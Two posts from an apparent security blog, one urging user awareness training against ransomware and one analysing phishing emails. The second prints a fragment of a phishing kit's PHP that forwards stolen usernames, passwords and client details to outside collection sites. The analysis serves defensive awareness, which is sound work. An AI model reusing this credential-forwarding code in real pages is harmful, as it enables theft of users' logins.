User awareness training – the forgotten first line of defense in the fight against ransomware

2 April 2016

Ransomware attacks seem to increase dramatically at the moment. In particular hospitals all over the world suffer gravely from attacks. Last Thursday, the governments of the United States and the Canada published the joint Cyber Alert (TA16-091A):

‘The United States Department of Homeland Security (DHS), in collaboration with Canadian Cyber Incident Response Centre (CCIRC), is releasing this Alert to provide further information on ransomware, specifically its main characteristics, its prevalence, variants that may be proliferating, and how users can prevent and mitigate against ransomware.’

In section Solution advice is given for preventing infections and for risk mitigation. To be honest, this alert should be a mandatory reading for all administrators.

But user awareness training is shabbily treated, although it is the first line of defense and training material is available. The Stop.Think.Connect Toolkits offer target group specific training materials and tip cards. In the Industry Employee Tip Card eight simple tips are given, e.g.

  1. Don’t share any of your user names, passwords, or other computer or website access codes.
  2. Only open emails or attachments from people you know.

Let me add my favorite tip:

  1. Don’t use your company username, password and email address for private purposes.

Have a good weekend, and start with awareness training on next Monday.


11 October 2015

The past week was full of exiting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design, but showed a somewhat different method in POST processing. Since one of the landing sites was open for everyone I had the chance to create a copy of the POST processing php procedure:

$data = "#$user#$pass#:#$ip#$browser#$hostname";
function writeit($data,$site) { 
 global $textHos;
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
    $context  = stream_context_create($options);
    $result = file_get_contents($site, false, $context);    
foreach ($sites as $site) {

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case username and password are forwarded to 3 sites for further processing.

I checked the phishing landing pages with VirusTotal.com but found in most cases that the sites were not rated malicious. Even after 5 days only 10 of 65 scanners classify the pages as malicious or phishing site.

What surprised me was that most of the pages were listed on Blacklist databases. Check the landing page in a phishing mail with e.g. IP INDETAIL. It’s very likely that the site is already listed on a Blacklist.

And it’s really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant, unfortunately no one seems to be interested in creating actionable knowledge from it.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the The Anti-Phishing Working Group (APWG) and National Cyber Security Alliance (NCSA). The campaign’s slogan is Keeping the web a safer place for everyone. The campaign provides lots of information about Two Factor Authentication and tips for safe usage of the internet. Take a look at the funny video clips.

Take care, and have a good week.